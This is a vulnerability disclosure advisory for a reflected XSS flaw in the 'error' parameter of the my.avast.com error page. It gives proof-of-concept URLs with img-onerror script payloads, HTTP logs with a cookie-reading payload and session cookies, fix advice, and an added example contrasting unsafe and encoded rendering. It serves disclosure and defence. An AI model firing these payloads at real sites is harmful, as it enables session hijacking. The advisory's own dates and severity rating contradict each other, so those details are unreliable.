AVAST (My) #15 - (frontend.exception) CS XSS Vulnerability

2016-04-18 00:00:00
Kieran Claessens - [http://www.vulnerability-lab.com/show.php?user=Kieran%20Claessens]
www.vulnerability-lab.com
Document Title:
===============
AVAST (My) #15 - (frontend.exception) CS XSS Vulnerability


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1625


Release Date:
=============
2016-04-18


Vulnerability Laboratory ID (VL-ID):
====================================
1625


Common Vulnerability Scoring System:
====================================
3.3


Product & Service Introduction:
===============================
Avast security software products are developed for Microsoft Windows, Mac OS X, Android and Linux users by AVAST 
Software s.r.o., a Czech private limited company. Avast was founded in 1988, and is headquartered in Prague, Czech Republic. 
It produces antivirus and security programs for personal and commercial use. In January 2015, Avast had 21.4% of the worldwide 
security vendor market share. As of March 2015, Avast had 233 million users of its products and services worldwide. According 
to a company press release, Avast protects more than 30 percent of the consumer PCs in the world outside of China. The software 
products have a user interface available in 45 languages. Avast has 500 employees; 90 percent of whom work in the Czech Republic. 
Avast has 13 offices in Prague, Brno, Germany, China, South Korea, Taiwan & U.S.

(Copy of the Homepage: https://en.wikipedia.org/wiki/Avast_%28software_company%29 )



Abstract Advisory Information:
==============================
An independent vulnerability laboratory researcher discovered a client-side vulnerability in the Avast Business online service web-application.


Vulnerability Disclosure Timeline:
==================================
2015-10-27: Researcher Notification & Coordination (Kieran Claessens)
2015-10-27: Vendor Notification (AVAST Security Team)
2015-11-02: Vendor Response/Feedback (AVAST Security Team)
2015-04-12: Vendor Fix/Patch (AVAST Developer Team)
2015-04-18: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
AVAST!
Product: My.Avast - Online Service (Web-Application) 2015 Q4


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Low


Technical Details & Description:
================================
A client-side cross site scripting web vulnerability has been discovered in the official Avast My online service web-application.
The client-side vulnerability allows remote attackers to inject script code into client-side browser-to-web-application requests.

The vulnerability is located in the `error` value of the frontend.exception module in the My Avast online-service web-application. Remote attackers are 
able to inject script code to manipulate client-side GET method requests to the my.avast.com website. The injection point is the `error` value of the 
exception, and the injected script code executes in the error message context. The attack vector of the vulnerability is client-side and 
the request method used to inject or execute is GET.

The security risk of the client-side cross site scripting web vulnerability is estimated as medium with a CVSS (Common Vulnerability Scoring System) count of 3.3. 
Exploitation of the client-side cross site scripting web vulnerability requires no privileged web-application user account and low or medium user interaction. 
Successful exploitation of the vulnerability results in session hijacking, non-persistent phishing, non-persistent external redirects, non-persistent loading of 
malicious script code or client-side manipulation of affected or connected modules.

Request Method(s):
				[+] GET

Vulnerable Module(s):
				[+] Avast - My

Vulnerable Parameter(s):
				[+] error

Affected Module(s):
				[+] frontend.exception - Exception Handling (Registration)


Proof of Concept (PoC):
=======================
The client-side cross site scripting vulnerability can be exploited by remote attackers without a privileged web-application user account and with low or medium user interaction. 
For a security demonstration or to reproduce the vulnerability, follow the information and steps provided below.

PoC: Links
https://my.avast.com/en-us/error?error=registration_already_finished"><img src="X" onerror="alert('xss')>"
https://my.avast.com/en-us/error?error="><img src="X" onerror="alert('xss')>" //this gives a more detailed error.


PoC: Source
<h1>frontend.exception.header.registration_already_finished"><img src="X" onerror="alert('xss')>" <="" h1="">
<p>frontend.exception.desc.registration_already_finished"><img src="X" onerror="alert('xss')>" <="" p="">
<a href="/en-us/" class="button button-inline button-huge button-secondary margin-top-20">Go to My Avast homepage.</a>
</p></h1>


--- PoC Session Logs [GET] ---
Status: 200[OK]
GET https://my.avast.com/en-us/error?error=registration_already_finished%22%3E%3Cimg%20src=%22X%22%20onerror=%22alert(document.cookie)%3E%22[CLIENT-SIDE SCRIPT CODE INJECT!] 
Load Flags[LOAD_DOCUMENT_URI  LOAD_INITIAL_DOCUMENT_URI  ] Größe des Inhalts[-1] Mime Type[text/html]
   Request Header:
      Host[my.avast.com]
      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0]
      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Accept-Language[de,en-US;q=0.7,en;q=0.3]
      Accept-Encoding[gzip, deflate]
      Cookie[app_params=error%3Dregistration_already_finished%2522%253E%253Cimg%2520src%3D%2522X%2522%2520onerror%3D%2522alert%28document.cookie%29%253E%2522; 
locale2=en-ww; _ga=GA1.2.1239098146.1445943331; mySessionId=bl5aNojSS9O8NHKd]
      Connection[keep-alive]
      If-Modified-Since[Fri, 23 Oct 2015 10:52:20 GMT]
   Response Header:
      Server[nginx/1.7.6]
      Date[Tue, 27 Oct 2015 11:32:30 GMT]
      Content-Type[text/html]
      Transfer-Encoding[chunked]
      Connection[keep-alive]
      Set-Cookie[locale2=en-us; Expires=Sun, 14 Nov 2083 14:46:37 GMT; Path=/; Domain=.avast.com; Secure; HTTPOnly
mySessionId=bl5aNojSS9O8NHKd; Expires=Tue, 27 Oct 2015 11:33:30 GMT; Path=/; Domain=.my.avast.com; Secure; HTTPOnly]
      Last-Modified[Fri, 23 Oct 2015 10:52:20 GMT]
      Cache-Control[max-age=0, private]
      Strict-Transport-Security[max-age=31536000]
      x-content-type-options[nosniff]
      X-XSS-Protection[1; mode=block]
      Content-Encoding[gzip]

Status: 200[OK]
GET https://my.avast.com/en-us/X[CLIENT-SIDE SCRIPT CODE VULNERABILITY!] 
Load Flags[LOAD_NORMAL] Größe des Inhalts[-1] Mime Type[text/html]
   Request Header:
      Host[my.avast.com]
      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0]
      Accept[image/png,image/*;q=0.8,*/*;q=0.5]
      Accept-Language[de,en-US;q=0.7,en;q=0.3]
      Accept-Encoding[gzip, deflate]
      Referer[https://my.avast.com/en-us/error?error=registration_already_finished%22%3E%3Cimg%20src=%22X%22%20onerror=%22alert(document.cookie)%3E%22]
      Cookie[app_params=error%3Dregistration_already_finished%2522%253E%253Cimg%2520src%3D%2522X%2522%2520onerror%3D%2522alert%28document.cookie%29%253E%2522; 
locale2=en-us; _ga=GA1.2.1239098146.1445943331; mySessionId=bl5aNojSS9O8NHKd]
      Connection[keep-alive]
   Response Header:
      Server[nginx/1.7.6]
      Date[Tue, 27 Oct 2015 11:32:30 GMT]
      Content-Type[text/html]
      Transfer-Encoding[chunked]
      Connection[keep-alive]
      Set-Cookie[mySessionId=bl5aNojSS9O8NHKd; Expires=Tue, 27 Oct 2015 11:33:30 GMT; Path=/; Domain=.my.avast.com; Secure; HTTPOnly]
      Last-Modified[Fri, 23 Oct 2015 10:52:20 GMT]
      Cache-Control[max-age=0, private]
      Strict-Transport-Security[max-age=31536000]
      x-content-type-options[nosniff]
      X-XSS-Protection[1; mode=block]
      Content-Encoding[gzip]


Reference(s):
https://my.avast.com/
https://my.avast.com/en-us/
https://my.avast.com/en-us/error


Solution - Fix & Patch:
=======================
The vulnerability can be patched by securely parsing and encoding the vulnerable `error` value in the frontend.exception module.
Restrict the input and disallow special characters to prevent client-side script code injection attacks. Encode the output in the error message 
context, where the wrong encoding is currently applied, to prevent execution of malicious client-side script code.

2015-04-12: Vendor Fix/Patch (AVAST Developer Team)
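
The following is an added example, not Avast's code, illustrating both the echo behaviour described in the Technical Details section and the fix outlined above: the unresolved translation key built from the `error` value is compared with a renderer that restricts the key to an allowlist and entity-encodes the output. MESSAGES is a hypothetical stand-in for the real frontend.exception translation table; the `error` value is taken from the PoC link in this advisory.

```javascript
// Added example, not Avast's code: the echo behaviour visible in the advisory's PoC source
// next to a hardened renderer. MESSAGES is a hypothetical stand-in for the real
// frontend.exception translation table.
const MESSAGES = {
  "frontend.exception.header.registration_already_finished": "Registration already finished",
  "frontend.exception.desc.registration_already_finished": "Your account is already activated.",
  "frontend.exception.header.generic": "Something went wrong",
  "frontend.exception.desc.generic": "An unexpected error occurred.",
};

// Mirrors the observed behaviour: an unknown key is left unresolved and the raw
// `error` value ends up inside the <h1>/<p> element content unencoded.
function renderErrorFragmentUnsafe(errorParam) {
  return `<h1>frontend.exception.header.${errorParam}</h1>\n` +
         `<p>frontend.exception.desc.${errorParam}</p>`;
}

// Minimal HTML entity encoding for text placed in element content.
function escapeHtml(text) {
  return String(text)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Input restriction: accept only a conservative character set and only keys that
// have a message; anything else falls back to the generic error.
function resolveErrorKey(errorParam) {
  const key = String(errorParam == null ? "" : errorParam);
  const wellFormed = /^[a-z0-9_]{1,64}$/.test(key);
  const known = wellFormed && (`frontend.exception.header.${key}` in MESSAGES);
  return known ? key : "generic";
}

// Output encoding: only looked-up, entity-encoded message text reaches the page;
// the raw `error` value never does.
function renderErrorFragment(errorParam) {
  const key = resolveErrorKey(errorParam);
  const header = MESSAGES[`frontend.exception.header.${key}`];
  const desc = MESSAGES[`frontend.exception.desc.${key}`];
  return `<h1>${escapeHtml(header)}</h1>\n<p>${escapeHtml(desc)}</p>`;
}

// Constructed test input with the same shape as the advisory's PoC link.
const POC_ERROR = 'registration_already_finished"><img src="X" onerror="alert(\'xss\')>"';
```

With the PoC value, renderErrorFragmentUnsafe reproduces the broken `<h1>`/`<p>` markup shown in the PoC source, while renderErrorFragment falls back to the generic message and emits no attacker-controlled markup.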


Security Risk:
==============
The security risk of the client-side cross site scripting web vulnerability in the my.avast web-application is estimated as medium. (CVSS 3.3)


Credits & Authors:
==================
Kieran Claessens - [http://www.vulnerability-lab.com/show.php?user=Kieran%20Claessens]


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, 
including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, 
including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised 
of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing 
limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.

Domains:    www.vulnerability-lab.com 		- www.vuln-lab.com 						- www.evolution-sec.com
Contact:    [email protected] 	- [email protected] 				- [email protected]
Section:    magazine.vulnerability-lab.com 	- vulnerability-lab.com/contact.php 				- evolution-sec.com/contact
Social:	    twitter.com/vuln_lab		- facebook.com/VulnerabilityLab 				- youtube.com/user/vulnerability0lab
Feeds:	    vulnerability-lab.com/rss/rss.php 	- vulnerability-lab.com/rss/rss_upcoming.php 			- vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php 	- vulnerability-lab.com/list-of-bug-bounty-programs.php 	- vulnerability-lab.com/register.php

Any modified copy or reproduction, including partial usage, of this file requires authorization from Vulnerability Laboratory. Permission to electronically 
redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or 
its suppliers. All pictures, texts, advisories, source code, videos and other information on this website are trademarks of the vulnerability-lab team & the specific 
authors or managers. To record, list, modify, use or edit our material, contact (admin@ or [email protected]) to ask for permission.

				    Copyright © 2016 | Vulnerability Laboratory - [Evolution Security GmbH]™